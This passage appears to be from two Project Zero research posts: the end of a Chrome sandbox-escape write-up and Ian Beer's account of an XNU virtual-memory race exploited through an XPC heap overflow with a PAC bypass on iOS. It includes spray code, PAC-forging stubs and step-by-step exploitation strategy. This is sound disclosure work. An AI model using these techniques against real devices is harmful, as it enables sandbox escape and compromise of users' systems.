getUint32(ptr + 0x20) == 0
obj = getPtr(ptr + 0x28)
vtable = getPtr(obj)
function = getPtr(vtable + 0x38)
The set of addresses which meet these constraints, unfortunately, does not really produce any useful primitives.

Step 5: ASLR Bypass

Having almost completely given up, we remembered one of the quirks related to issue 1642, a bug in the Mojo core code. Specifically, when the receiving end of a Mojo connection receives a DataPipe*Dispatcher object, it will immediately map an associated shared memory section (the mapping occurs inside the call to InitializeNoLock).
Since there’s no memory or virtual address space limit in the browser process, this suggests that in fact, we may be able to completely bypass ASLR without an information leak if we can simply spray the virtual address space of the browser with shared memory mappings. Note - the renderer limits will still be applied, so we need to find a way to do this without exceeding the renderer limits. This should be fairly trivial from native code running in the renderer; we can simply duplicate handles to the same shared memory page, and repeatedly send them - but it would be nice to stay in Javascript.
Looking into the IDL for the MojoHandle interface in MojoJS bindings, we can note that while we can’t clone DataPipe handles, we can clone SharedBuffer handles.
interface MojoHandle {
   ...

   // TODO(alokp): Create MojoDataPipeProducerHandle and MojoDataPipeConsumerHandle,
   // subclasses of MojoHandle and move the following member functions.
   MojoWriteDataResult writeData(BufferSource buffer, optional MojoWriteDataOptions options);
   MojoReadDataResult queryData();
   MojoReadDataResult discardData(unsigned long numBytes, optional MojoDiscardDataOptions options);
   MojoReadDataResult readData(BufferSource buffer, optional MojoReadDataOptions options);

   // TODO(alokp): Create MojoSharedBufferHandle, a subclass of MojoHandle
   // and move the following member functions.
   MojoMapBufferResult mapBuffer(unsigned long offset, unsigned long numBytes);
   MojoCreateSharedBufferResult duplicateBufferHandle(optional MojoDuplicateBufferHandleOptions options);
};
Unfortunately, SharedBuffers are used much less frequently in the browser process interfaces, and they’re not automatically mapped when they are deserialized, so they’re less useful for our purposes. However, since both SharedBuffers and DataPipes are backed by the same operating-system level primitives, we can still use this to our advantage; by creating an equal number of DataPipes with small shared memory mappings, and clones of a single, large SharedBuffer, we can then use our arbitrary read-write to swap the backing buffers!

As we can see in the VMMap screenshot above - this is both effective and quick! The first test performed a 16-terabyte spray, which got a bit laggy, but in the real-world about 3.5-terabytes appears sufficient to get a reliable, predictable address. Finally, a chance to cite SkyLined’s exploit for MS04-040 in a modern 64-bit Chrome exploit!
A little bit of fiddling later:
rax=00000404040401e8 rbx=000001fdba193480 rcx=00000404040401e8
rdx=000001fdba193480 rsi=00000002f39fe97c rdi=00000404040400b0
rip=00007ffd87270258 rsp=00000002f39fe8c0 rbp=00000002f39fea88
 r8=00000404040400b0  r9=00000002f39fe8e4 r10=00000404040401f0
r11=0000000000000000 r12=0000000000000000 r13=00000002f39fea90
r14=0000000000000001 r15=00000002f39fea08
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
chrome!storage::FileSystemContext::CreateFileSystemOperation+0x4c:
00007ffd`87270258 41ff5238        call    qword ptr [r10+38h] ds:00000404`04040228=4141414141414141

Roadmap

Ok, at this point we should have all the heavy machinery that we need - the rest is a matter of engineering. For the detail-oriented; you can find a full, working exploit in the bugtracker, and you should be able to identify the code handling all of the following stages of the exploit:
  1. Arbitrary read-write in the renderer
    1. Enable MojoJS bindings
    2. Launch sandbox escape
  2. Sandbox escape
    1. Arbitrary read-write in the renderer (again…)
    2. Locate necessary libraries for pivots and ROP chain in the renderer address space
    3. Build a page of data that we’re going to spray in the browser address space containing fake FileSystemOperationRunner, FileSystemContext, FileSystemBackend objects
    4. Trigger the bug
    5. Replace the free’d FileWriterImpl with a fake object that uses the address that we’ll target with our spray as the FileSystemOperationRunner pointer
    6. Spray ~4tb of copies of the page we built in 2c into the browser process address space
    7. Return from the renderer to FileWriterImpl::DoWrite in the browser process, pivoting into our ROP chain and payload
    8. Pop calc
    9. Clean things up so that the browser can continue running
Conclusions

It’s interesting to have another case where we’ve been able to use weaknesses in ASLR implementations to achieve a working exploit without needing an information leak.
There were two key ASLR weaknesses that enabled reliable exploitation of this bug:
  • No inter-process randomisation on Windows (which is also a limitation on MacOS/iOS) which enabled locating valid code addresses in the target process without an information-leak.
  • No limitations on address-space usage in the Chrome Browser Process, which enabled predicting valid data addresses in the heap-spray.

Without both of these primitives, it would be more difficult to exploit this vulnerability, and would likely have pushed past available motivation (better to keep looking for a better vulnerability, or an additional information leak since the use-after-free wasn’t readily usable as an information leak).

Splitting atoms in XNU

1 April 2019 - 22:12
Posted by Ian Beer, Google Project Zero

TL;DR

A locking bug in the XNU virtual memory subsystem allowed violation of the preconditions required for the correctness of an optimized virtual memory operation. This was abused to create shared memory where it wasn't expected, allowing the creation of a time-of-check-time-of-use bug where one wouldn't usually exist. This was exploited to cause a heap overflow in XPC, which was used to trigger the execution of a jump-oriented payload which chained together arbitrary function calls in an unsandboxed root process, even in the presence of Apple's implementation of ARM's latest Pointer Authentication Codes (PAC) hardware mitigation. The payload opened a privileged socket and sent the file descriptor back to the sandboxed process, where it was used to trigger a kernel heap overflow only reachable from outside the sandbox.
Exploit for iOS 12.0 on iPhone Xs.

Part I: A virtual memory bug

What's in your space?

Most operating systems maintain two data structures representing the virtual address space of processes:
  • A management data-structure, which contains abstract descriptions of what every virtual memory address which is valid in a process should contain

  • A hardware data-structure, typically used by a hardware memory management unit to implement the virtual-to-physical address translations which happen each time memory is read or written

The management data-structures contain book-keeping information like "the 4KB region from address 0x1234000 to 0x1235000 should contain the bytes from the file /tmp/hello starting at offset 0x3000".
The hardware data-structures contain the hardware-specific implementation details of how to translate from virtual address to physical memory address; the hardware will use them at runtime to find the physical addresses which should be used for each memory access.
In XNU the management data structure is a red-black tree of vm_map_entry structures, contained in a struct vm_map. There's generally one vm_map per task. For iOS on modern iPhones the hardware data structures are ARM64 Translation Tables.
One of the major responsibilities of an OS virtual memory subsystem is to keep these data structures in sync; modifications to the high-level representation of virtual memory should be accurately reflected in the hardware data structures when required. The hardware structures are generally created lazily on demand in response to actual memory usage, and the management structures must be the ground truth representation of what a task's virtual address space should contain.
Any bugs in the maintenance of these management structures are likely to have interesting consequences.

Copyin'

vm_map_copyin_internal in vm_map.c converts a virtual memory region from a task's vm_map into a "copied in" form, constructing a vm_map_copy structure representing the copied virtual memory which can be passed around and subsequently mapped into another task's vm_map (or mapped back into the same vm_map which it came from.)
The function contains a while loop which iterates through each of the vm_map_entry structures making up the virtual memory region to be copied and tries to append a copied form of each vm_map_entry to a vm_map_copy structure.
Under certain circumstances this copy operation can be optimized into a move operation, here's a code snippet with verbatim comments describing one such case:
/*
 *  Attempt non-blocking copy-on-write optimizations.
 */

  if (src_destroy &&
      (src_object == VM_OBJECT_NULL ||
        (src_object->internal &&
         src_object->copy_strategy == MEMORY_OBJECT_COPY_SYMMETRIC &&
         !map_share)
       )
      )  {
    /*
     * If we are destroying the source, and the object
     * is internal, we can move the object reference
     * from the source to the copy.  The copy is
     * copy-on-write only if the source is.
     * We make another reference to the object, because
     * destroying the source entry will deallocate it.
     */
    vm_object_reference(src_object);

    /*
     * Copy is always unwired.  vm_map_copy_entry
     * set its wired count to zero.
     */

    goto CopySuccessful;
This optimization will apply if the source vm_map_entry represents anonymous memory (such as that returned via mach_vm_allocate) and the semantics of the copy operation being performed will cause that memory to be deallocated from the source vm_map. In that case, as the comment describes, the vm_map_entry can be "moved" from the source vm_map into the vm_map_copy structure, rather than a copy-on-write copy being created.
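To make the src_destroy case concrete, the following is a rough sketch (not code from the exploit; dest_port is an assumed send right, and error handling is omitted) of moving an anonymous region to another task as an out-of-line descriptor with the deallocate flag set:

#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <string.h>

// Hedged sketch: send an anonymous region as an out-of-line descriptor with
// the deallocate flag set, which drives vm_map_copyin down the src_destroy
// "move" path described above.
static void send_ool_with_deallocate(mach_port_t dest_port) {
  mach_vm_address_t addr = 0;
  mach_vm_size_t size = 0x100000;

  // Anonymous memory, so the backing object is internal with the symmetric
  // copy strategy, matching the optimization's preconditions.
  mach_vm_allocate(mach_task_self(), &addr, size, VM_FLAGS_ANYWHERE);

  struct {
    mach_msg_header_t header;
    mach_msg_body_t body;
    mach_msg_ool_descriptor_t ool;
  } msg;
  memset(&msg, 0, sizeof(msg));

  msg.header.msgh_bits =
      MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0) | MACH_MSGH_BITS_COMPLEX;
  msg.header.msgh_remote_port = dest_port;
  msg.header.msgh_size = sizeof(msg);
  msg.body.msgh_descriptor_count = 1;

  msg.ool.type = MACH_MSG_OOL_DESCRIPTOR;
  msg.ool.address = (void *)addr;
  msg.ool.size = (mach_msg_size_t)size;
  msg.ool.copy = MACH_MSG_VIRTUAL_COPY;
  msg.ool.deallocate = TRUE;  // src_destroy: the region is removed from the sender

  mach_msg(&msg.header, MACH_SEND_MSG, sizeof(msg), 0,
           MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
}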
In practice this optimization will be encountered whenever a mach message is sent containing an out-of-line descriptor with the deallocate flag set, exactly as in the sketch above. This is a low-overhead way to move large regions of virtual memory between processes, something which can happen with some frequency in XNU.

Only mostly atomic...

The vm_map_entry structures making up the source of the region to be moved will only be removed from the source vm_map after they have all been copied into the vm_map_copy. This happens in the vm_map_delete call, right after the while loop:
  }   // end while(true)

  /*
   * If the source should be destroyed, do it now, since the
   * copy was successful.
   */
  if (src_destroy) {
    (void) vm_map_delete(src_map,
                         vm_map_trunc_page(src_addr,
                                           VM_MAP_PAGE_MASK(src_map)),
                         src_end,
                         ((src_map == kernel_map) ?
                           VM_MAP_REMOVE_KUNWIRE :
                           VM_MAP_NO_FLAGS),
                         VM_MAP_NULL);
In order for the move optimization to be correct it is fundamentally important that the copy and removal of the entries is performed atomically; nothing else should be able to mutate the source vm_map while this is happening, as if it could it might also be able to perform an "optimized move" at the same time! In reality, the atomicity is easy to break :(
Above the while loop which iterates through the vm_map_entry's in the source region they take the source vm_map's lock:
 vm_map_lock(src_map);
but looking down the code for calls to vm_map_unlock we find this (again, the comment is verbatim from the source):
  /*
   *  Create a new address map entry to hold the result.
   *  Fill in the fields from the appropriate source entries.
   *  We must unlock the source map to do this if we need
   *  to allocate a map entry.
   */
  if (new_entry == VM_MAP_ENTRY_NULL) {
    version.main_timestamp = src_map->timestamp;
    vm_map_unlock(src_map);

    new_entry =
      vm_map_copy_entry_create(copy,
      !copy->cpy_hdr.entries_pageable);

    vm_map_lock(src_map);

    if ((version.main_timestamp + 1) != src_map->timestamp) {
      if (!vm_map_lookup_entry(src_map,
                               src_start,
                               &tmp_entry))
      {
          RETURN(KERN_INVALID_ADDRESS);
      }
      if (!tmp_entry->is_sub_map)
        vm_map_clip_start(src_map, tmp_entry, src_start);
      continue; /* restart w/ new tmp_entry */
  }
We'll hit this path if the region being copied is comprised of more than one vm_map_entry, since we allocate the first vm_map_entry for new_entry before initially taking the src_map lock.
Quickly dropping a very important lock and retaking it is a common anti-pattern I've observed across the XNU codebase; I'm sure this isn't the only instance of it. In this case this is presumably a hack because vm_map_copy_entry_create may in some cases need to take a vm_map lock.
After reacquiring the src_map lock they perform the following check:
 if ((version.main_timestamp + 1) != src_map->timestamp)
The vm_map timestamp field is a 32-bit value incremented each time the map is unlocked:
 #define vm_map_unlock(map) \
   ((map)->timestamp++ , lck_rw_done(&(map)->lock))
This is trying to detect whether another thread acquired and dropped the lock while this thread dropped it then reacquired it. If so, the code checks whether there's still a vm_map_entry covering the current address it's trying to copy and then bails out and looks up the entry again.
The problem is that this check isn't sufficient to ensure the atomicity of the optimized copy; just because there's still a vm_map_entry covering this address doesn't mean that while the lock was dropped another thread didn't start its own optimized move operation.
The entries which have previously been appended to the vm_map_copy aren't also invalidated, meaning the atomicity of the optimization can't be guaranteed.
The locking is insufficient to prevent two threads concurrently believing they are performing atomic vm_map_entry move operations on the same vm_map_entry.

Overlap

Triggering the issue requires us to create two threads, each of which will attempt to perform the move optimization at the same time. If we create a large virtual memory region consisting of alternating anonymous memory entries and memory object entries, we can ensure that copies of the region will require multiple iterations of the vm_map_copy building loop which contains the bad locking primitive. I chose to structure the region as shown in the diagram below, where two out-of-line descriptors consisting of alternating mapping types overlap by one anonymous memory entry. It is this entry to which we want to have the move optimization applied twice, meaning it will appear in two vm_map_copy lists, each believing it has also been atomically removed from the source address space:
[Diagram: two overlapping out-of-line descriptors built from alternating mapping types, sharing a single anonymous memory entry]

By sending one of these out-of-line descriptors to another process via a mach message, and one to ourselves, we will inadvertently create shared memory! This means that once both processes have received the mach messages the sender's writes to the anonymous page are reflected in the target's address space, something which violates the semantics of mach messages.

build-your-own-bug with virtual memory issues

In 2017 lokihardt found CVE-2017-2456, a similar style of issue involving out-of-line descriptors being backed by shared memory. He found that this could be turned into a heap overflow in libxpc when it parses an XPC dictionary. Specifically, libxpc will call strlen on a buffer in the now-shared memory, use that length plus one to allocate a buffer, then call strcpy to fill the buffer. The strcpy will copy until it finds a NULL byte, unaware of the size of the destination buffer.
By itself such code does not have a bug, because the semantics of mach messages imply that received out-of-line descriptors cannot be modified by the sender. But, if due to a virtual memory bug, the memory is actually shared then this code has a time-of-check-time-of-use "bug."
We'll use this same primitive to build a controlled heap overflow primitive with which we can target any XPC service. I used the custom XPC serialization library I wrote for triple_fetch. For more details check out the exploit. From here on we'll assume we can groom the heap using XPC and cause a heap overflow with non-null bytes during deserialization of an XPC dictionary.Part II: Escaping userspace sandboxes with PACApple's latest A12 system-on-a-chip is the first widely deployed implementation of ARMv8.3's Pointer Authentication Codes feature, commonly referred to as PAC. For a deep-dive into PAC internals check out Brandon Azad's prior work. In this section I'll explore PAC's impact on the exploitation of memory corruption bugs in the context of a userspace sandbox escape. For a more technical overview read section D5.1.5 of the ARM manual.unPACking Pointer Authentication CodesPAC introduces a new set of instructions which treat some of the higher bits of a 64-bit value as an "authentication code" field. There are instructions to add, validate and remove authentication codes, with the intended use case being to add these authentication codes into pointers stored in memory. The idea is that an attacker now has to be able to guess, forge or leak a valid authentication code if they wish to corrupt a pointer and have that pointer used by the target process. Let's take a closer look:
Pointers

In iOS userspace pointer authentication codes are 16 bits wide, occupying the bits above the 39-bit userspace virtual address space:

A pointer without an authentication code might look like this:  0x000000019219816c
And that same pointer with an authentication code might look like this:  0x001f32819219816c
(Note that the authentication code field isn't aligned on a hex-digit boundary; since the address space is 39 bits, the code actually begins at the high bit of the 8.)
The lower 39 bits of the pointer with the authentication code match the same bits in the pointer without the code. The pointer containing the code can't be dereferenced; it's outside the valid address space (unless the code were all zeros.) Instead, ARMv8.3 provides instructions to remove and verify the code. If the verification fails then the hardware will flip a high bit in the resulting pointer, causing it to become invalid. It's only when code attempts to dereference such a pointer that an address translation exception will occur; a PAC code verification failure by itself doesn't cause an exception.
Contexts

The authentication code is derived from three sources: a key, a value to be authenticated (the pointer), and a 64-bit context value. It's this context value which enables many of the more interesting applications of PAC. For example, a pointer's PAC can be created using the address of the pointer itself, meaning that even if a PAC'ed pointer could be disclosed to an attacker, it would only be valid were it reused at the same address. In many cases, however, the context value is zero, and PAC provides convenience instructions for specifying a zero context value.

Keys

The kernel manages five keys, grouped into three types (instruction, data and general) and two key families (A and B). In iOS userspace the A-family keys are shared between all processes and the B-family keys are unique per-process. Userspace cannot read or write these keys; they are controlled by EL1 (the kernel) and used implicitly by the PAC instructions.
Instructions

Section C3.1.9 of the ARM manual describes all the new pointer authentication instructions. They fall into four categories:
 PAC* : add an authentication code to a value
 AUT* : authenticate a value containing an authentication code
 XPAC* : remove an authentication code without validation
 COMBINATION : combine one of the above PAC operations with another instruction
Let's look at PACIA. The I and A tell us which key this instruction uses (the A-family Instruction key.) PACIA has two operands:
 PACIA <Xd>, <Xn|SP>
Xd is the register containing the pointer which should have an authentication code added to it. Xn|SP is the register containing the context value which should be used in combination with the A-family instruction key to generate the authentication code, which can be a general-purpose register or the SP register.
There are many variants of the PAC* instructions for using different keys and specific context values, for example:
 PACIZA <Xd> : use zero as the context value for creating an authentication code for register Xd with A-family instruction key
 PACDZB <Xd> : use zero as the context value for creating an authentication code for register Xd with B-family data key
 PACIBSP : add an authentication code to X30 (the link register, containing the return address from a function call) using SP as the context value and the B-family instruction key
There are similar variations for the AUT* instructions, which perform the inverse verification operation to their PAC* counterparts:
 AUTIA <Xd>, <Xn|SP>
Here Xd is the register containing the pointer with an authentication code to be validated. Xn|SP is the register containing the context value; in order for the authentication to succeed the context value passed here must match the value provided when the authentication code was added. This variant will use the A-family instruction key. If the authentication code matches, it is stripped from register Xd such that the register contains the original raw pointer.
If the authentication code doesn't match (because either the pointer value is incorrect, the authentication code is incorrect, the context value is incorrect or the key is different) then the code is still stripped from register Xd but a high bit is then flipped in Xd such that any subsequent dereference of the pointer would cause an address translation exception.
AUTIZA, AUTDZB, AUTIBSP and so on perform the inverse authentication operation to their PAC* counterparts.
The XPAC* instructions remove the PAC bits from a pointer without verifying the code.
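The zero-context variants are straightforward to experiment with directly; here's a minimal sketch (not the exploit's code, and it only builds for a target with ARMv8.3 pointer authentication, e.g. arm64e) wrapping PACIZA and AUTIZA in C helpers:

#include <stdint.h>

// Sign a value with the A-family instruction key and a zero context, then
// authenticate it again. On authentication failure a high bit is flipped in
// the result rather than an exception being raised here.
static uint64_t sign_ia_zero(uint64_t ptr) {
  __asm__ volatile("paciza %0" : "+r"(ptr));
  return ptr;
}

static uint64_t auth_ia_zero(uint64_t signed_ptr) {
  __asm__ volatile("autiza %0" : "+r"(signed_ptr));
  return signed_ptr;
}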
The combination instructions provide simple primitives for using PAC to perform one of four common operations:
 B(L)RA* : branch (and link) with authentication
 RETA* : return with authentication
 ERETA* : return across exception level with authentication
 LDRA* : load from address with authentication
These instructions also support using various keys and fixed or particular context values, for example:
 RETAB: use SP (the stack pointer) as the context value to authenticate LR (the link register) using the B-family instruction key and if authentication is successful continue execution at the authenticated LR value, but don't write the authenticated value back to LR.
 BLRAAZ <Xn> : use zero as the context value to authenticate the contents of register Xn using the A-family instruction key. If authentication is successful, continue execution at the authenticated Xn address and store PC+4 into LR (the link register), but don't write the authenticated value of Xn back.

PAC primitives

In iOS 12 on A12 devices the compiler uses some of the new PAC instructions to build new security primitives.
For example, as a mitigation against return-oriented programming (ROP), function prologues and epilogues have changed from looking like this:
 SUB      SP, SP, #0x20
 STP      FP, LR, [SP,#0x10]
 ADD      FP, SP, #0x10
 ...
 LDP      FP, LR, [SP,#0x10]
 ADD      SP, SP, #0x20
 RET
to looking like this:
 PACIBSP
 SUB      SP, SP, #0x20
 STP      FP, LR, [SP,#0x10]
 ADD      FP, SP, #0x10
 ...
 LDP      FP, LR, [SP,#0x10]
 ADD      SP, SP, #0x20
 RETAB
PACIBSP uses the value of SP at the function entry point as the context value to add an authentication code using the B-family instruction key to LR (the link register, containing the return address.) LR is then spilled to the stack. At the end of the function, when SP should be equal to its value when the function was entered, RETAB uses SP as the context value again to verify LR's authentication code after loading it from the stack. If LR's code is valid, then execution continues at that address.
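Note that this is purely a compiler/ABI change: building any non-leaf C function for the arm64e ABI is enough to pick up the PACIBSP/RETAB pair shown above, with no source changes. A trivial example:

#include <stdio.h>

// Compiled for arm64e this gets the protected prologue/epilogue;
// compiled for plain arm64 it gets the unprotected sequence shown earlier.
void log_message(const char *msg) {
  printf("message: %s\n", msg);
}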
What does this mean in practice? Since the B-family keys are unique per-process on iOS it means that from another process we cannot forge a fake return address which would pass the authentication check in RETAB by running the PACIBSP instruction ourselves. In addition, the use of SP as the context value means that even if we had the ability to disclose stack memory we would only be able to reuse authenticated pointers when the value of SP matches. It's important to observe here that this just breaks a particular technique commonly seen in public exploits; whether use of that technique is a necessary part of exploitation is another question.
In general, almost all function pointers are now somehow making use of PAC: weakly protected pointers use an A-family key and a zero context value, while strongly protected pointers use a B-family key with a non-zero context derived from some runtime value.

Necessary compromises...

The per-process B-family keys are only used in a handful of situations. The more common use of A-family shared keys is a necessary compromise. Consider the pages of memory containing C++ vtables in shared libraries. These pages are copy-on-write shared between processes. If each pointer in each vtable contained a B-family authentication code, then these pages could no longer be copy-on-write shared between all processes, as each process would have unique vtables. This would introduce an extreme memory and performance overhead as much of the shared cache would have to be copied and "reauthenticated" each time a new process were created.
The use of the B-family keys for ROP mitigation is possible because a stack frame is never shared between processes (unless you're doing something really weird...). For other possible uses of PAC it's much harder to assert that a particular pointer will never escape the confines of a particular process, even in a COW way.

Exploiting memory corruption in the presence of PAC

The attack scenario is important to consider when discussing exploitation and mitigations. The exploit I describe here assumes the attacker already has native code execution of some sort. Although the proof-of-concept exploit provided is a "malicious app", that is only one possible scenario. Similar primitives to those used by this exploit could also be implemented from a Safari WebContext exploit able to write shellcode to JIT memory, or even with only an arbitrary read/write primitive and an A-family PAC signing oracle.
(There is some usage of PAC in JavaScriptCore on A12 to try to provide some integrity while native code is being emitted; bypassing this is left as an exercise for the reader ;) )
Given these attack scenarios, we can assume that an attacker is able to forge PAC codes which use A-family keys. Since these keys are shared between all processes, if we execute an instruction like PACIA in our attacker process, the resulting PAC code will also be valid for identical inputs in another process.
New Mitigations; New Primitives

Using the atomicity bug, we've built a heap corruption primitive targeting libxpc which we can trigger by sending an XPC dictionary to a target.
In my triple_fetch exploit from 2017, which also targeted a bug in libxpc, I corrupted an objective-C object's isa pointer. From there you get control of the selector cache and from there complete control of PC when a selector is called.
On A12 devices, objective-C now uses the B-family instruction key to authenticate entries in the selector cache:
_objc_msgSend:
...
  LDP   X17, X9, [X12] ; X12 points into selector cache
                       ; X17 := fptr ; X9 := selector ptr
  CMP   X9, X1         ; does the cached selector ptr match?
  B.NE  no_match       ; no? try next one if more entries, otherwise:
  EOR   X12, X12, X1   ; XOR the selector pointer into the context ;)
  BRAB  X17, X12       ; yes? Branch With Authentication
                       ;      using B-family Instruction key
                       ;      and selector cache entry address
                       ;      as context
(The selector XOR is a recent addition to prevent an authenticated function pointer being reused for a different selector but in the same cache slot)
Without the ability to forge or disclose B-family authenticated pointers we can't simply point to a fake selector cache. This breaks the fake selector cache technique.
The trick I'm using here is that while the selector cache entries are "tied" to a particular cache by PAC, the isa pointers (which point to the objective-C class object) are not tied to particular objects. An objective-C object still has a "raw" isa class pointer as its first 8 bytes. This means we can still use a memory corruption primitive to replace an object's isa pointer with another type's isa pointer, allowing us to create a type confusion. We then just need to find a suitable replacement type such that an A-family authenticated function pointer will be read from it and called, as opposed to a fake selector cache. Since we can forge A-family authenticated pointers this will give us initial PC control.
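As a side note, the replacement isa value itself is easy to obtain: libxpc lives in the dyld shared cache, which is mapped at the same address in every process for a given boot, so the attacker can look the class pointer up locally. A sketch (my helper, not the exploit's code):

#include <objc/runtime.h>
#include <stdint.h>

// The isa slot of the fake object is a raw, unauthenticated pointer, so the
// value we need is just the address of the OS_xpc_file_transfer class
// object, which is the same in our process and in the target.
static uint64_t fake_isa_value(void) {
  Class cls = objc_getClass("OS_xpc_file_transfer");
  return (uint64_t)(uintptr_t)cls;
}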
As a place to start I began looking through the various implementations of XPC object destruction in libxpc. These are the methods with names like __xpc_TYPE_dispose, called when xpc objects are freed.
For example, here's a snippet from __xpc_pipe_dispose:
 PACIBSP
 STP      X20, X19, [SP,#-0x10+var_10]!
 STP      X29, X30, [SP,#0x10+var_s0]
 ADD      X29, SP, #0x10
 MOV      X19, X0
 LDR      W0, [X19,#0x24] ; name
 CBZ      W0, loc_180AFFED0
 BL       __xpc_mach_port_release
We could use the isa overwrite technique to craft a fake xpc_pipe object such that this method would be called, letting us pass an arbitrary mach port name to mach_port_deallocate. You could then use techniques such as those I used in mach_portal, or that Brandon Azad used in blanket, to impersonate an arbitrary mach service.
Note that for that approach we wouldn't need to forge any PAC-authenticated pointers.
Instead we're deliberately going to get PC control, so we need to read more methods. Here's the start of __xpc_file_transfer_dispose:
 PACIBSP
 STP      X20, X19, [SP,#-0x10+var_10]!
 STP      X29, X30, [SP,#0x10+var_s0]
 ADD      X29, SP, #0x10
 MOV      X19, X0
 LDR      W8, [X19,#0x58]
 CMP      W8, #1
 B.EQ     loc_180B06CDC
 LDR      X0, [X19,#0x40] ; aBlock
 CBZ      X0, loc_180B06C70
 BL       __Block_release_0

If the qword at X0+0x40 is non-zero it will be passed to _Block_release, which is part of the open-source libclosure package:
void _Block_release(const void *arg) {
  struct Block_layout *aBlock = (struct Block_layout *)arg;
  if (!aBlock) return;
  if (aBlock->flags & BLOCK_IS_GLOBAL) return;
  if (! (aBlock->flags & BLOCK_NEEDS_FREE)) return;

  if (latching_decr_int_should_deallocate(&aBlock->flags)) {
    _Block_call_dispose_helper(aBlock);
    _Block_destructInstance(aBlock);
    free(aBlock);
  }
}
Here we can see the argument is actually a Block_layout structure. The code checks some flags, then decrements a reference count. If it decides that the object should be freed it calls _Block_call_dispose_helper:
static void _Block_call_dispose_helper(struct Block_layout *aBlock)
{
  struct Block_descriptor_2 *desc = _Block_descriptor_2(aBlock);
  if (!desc) return;

  (*desc->dispose)(aBlock);
}
This clearly calls a function pointer from the block structure. Let's look at this in assembly, here from 12.0:
  LDR     X8, [X19,#0x18] ; read the Block_descriptor_2 pointer from
                          ;   +0x18 in the block
  LDR     X9, [X8,#0x18]! ; bump that pointer up by 0x18 and load the
                          ;   value there into X9 (X8 is written back
                          ;   with the address it was loaded from)
  AUTIA   X9, X8          ; authenticate X9 using A-family instruction
                          ;   key and X8 (the address the pointer was
                          ;   read from) as context
  PACIZA  X9              ; add a new PAC code to the function pointer
                          ;   using A-family instruction key and a
                          ;   zero context
  MOV     X0, X19         ; pass the block as the first argument
  BLRAAZ  X9              ; branch with link register and authenticate
                          ;   using A-family instruction key and
                          ;   zero context
(this code has changed slightly in later versions but the functionality we're using remains the same)
This gives us a path from corrupting an objective-C object pointer to PC control which doesn't involve any B-family keys. A prerequisite is that we can place known data at a known location, since we will need to forge the context value here:
 AUTIA   X9, X8
which is the address from which X9 was read. For this I'm using the same mach_msg OOL_DESCRIPTOR spray technique which continues to work on iOS 12. Note that the memory overhead for this is very low, as we are actually just sending multiple copies of the same anonymous region for the spray.
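The core of that spray looks something like the following sketch (not the exploit's code; the function name is mine, dest is assumed to be a send right to a port whose messages the target will receive, and sizes/counts are placeholders):

#include <mach/mach.h>
#include <string.h>

// One spray message: an out-of-line descriptor referencing the same
// anonymous buffer each time. MACH_MSG_VIRTUAL_COPY lets the kernel share
// the pages copy-on-write rather than physically copying them, which is why
// the memory overhead of a large spray stays low.
typedef struct {
  mach_msg_header_t         header;
  mach_msg_body_t           body;
  mach_msg_ool_descriptor_t ool;
} spray_msg_t;

static kern_return_t send_spray_msg(mach_port_t dest, void *buf, size_t size) {
  spray_msg_t msg;
  memset(&msg, 0, sizeof(msg));
  msg.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0) |
                         MACH_MSGH_BITS_COMPLEX;
  msg.header.msgh_remote_port = dest;  // the target ends up receiving this
  msg.header.msgh_size = sizeof(msg);
  msg.body.msgh_descriptor_count = 1;
  msg.ool.type       = MACH_MSG_OOL_DESCRIPTOR;
  msg.ool.address    = buf;            // the page(s) we want mapped remotely
  msg.ool.size       = (mach_msg_size_t)size;
  msg.ool.copy       = MACH_MSG_VIRTUAL_COPY;
  msg.ool.deallocate = FALSE;
  return mach_msg(&msg.header, MACH_SEND_MSG, sizeof(msg), 0,
                  MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
}

Sending enough of these is what makes fixed addresses like the 0x120200120 used below a reasonable bet in the target.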
Putting those steps together, our strategy looks like this:
 1. Build an XPC dictionary (inside a region of memory which we can target with the non-atomic copy when we send it) which grooms the heap such that we can land the bad strcpy buffer right before an xpc_array backing buffer.
 2. Trigger the non-atomic move bug so that we can continue to write to the serialized XPC dictionary while the target process is deserializing it, and use that to cause the bad strcpy, overflowing into the first pointer in the xpc_array backing buffer.
 3. Point that pointer to a crafted XPC object contained in the OOL_DESCRIPTOR heap spray which has an xpc_file_transfer isa pointer as its first member.
 4. When the xpc_array is destroyed, __xpc_file_transfer_dispose will be called, which will follow a controlled pointer chain to call an A-family authenticated function pointer.
This diagram shows the layout in the attacker's address space of the XPC dictionary inside the non-atomic region:

The XPC dictionary contains duplicate keys which it uses as a primitive for grooming the heap and making holes. It attempts to groom a layout similar to this:

If everything goes to plan, by flipping the flipper byte in the sender process we can race the strlen; malloc; strcpy sequence in the XPC deserialization code. The target first sees a short string, whose length determines the undersized strcpy destination buffer, which malloc should slot right before the target xpc_array backing buffer if the groom worked. The null byte is then replaced by a non-null byte before strcpy reads it, so the copy proceeds off the end of the undersized destination buffer and corrupts the first entry in the xpc_array's backing buffer, which is an array of pointers (or tagged pointers) to xpc objects.
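Schematically, the racy pattern in the deserializer looks like this (a simplified sketch, not libxpc's actual source):

#include <stdlib.h>
#include <string.h>

// 'shared' points into the serialized dictionary, which the sender can still
// modify thanks to the non-atomic copy. If the flipped byte is 0 during
// strlen but non-zero by the time strcpy runs, the copy overflows buf.
static char *deserialize_string(const char *shared) {
  size_t len = strlen(shared);   // sees the short string
  char *buf = malloc(len + 1);   // undersized buffer, groomed to sit right
                                 // before the xpc_array backing buffer
  if (!buf) return NULL;
  strcpy(buf, shared);           // re-reads attacker memory: overflow
  return buf;
}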
We corrupt the first pointer to instead point to a fake xpc_file_transfer object in the heapspray which we try to place at 0x120200120:

When the xpc_array containing the now-corrupted pointer is released it will release each of the entries in the array, causing the fake OS_xpc_file_transfer isa to be read and 0x120200120 to be passed as the first (self) argument to __xpc_file_transfer_dispose. This code reads the fake block pointer at 0x120200160, then reads the fake descriptor pointer at 0x120200018, and finally performs a PAC authentication on the pointer read from 0x120200098 using the A-family instruction key and the address of the pointer as the context.
The exploit uses a small assembly stub to allow us to forge a valid pointer here:
 .globl  _pacia
 .align  2
 _pacia:
    pacia x0, x1
    ret
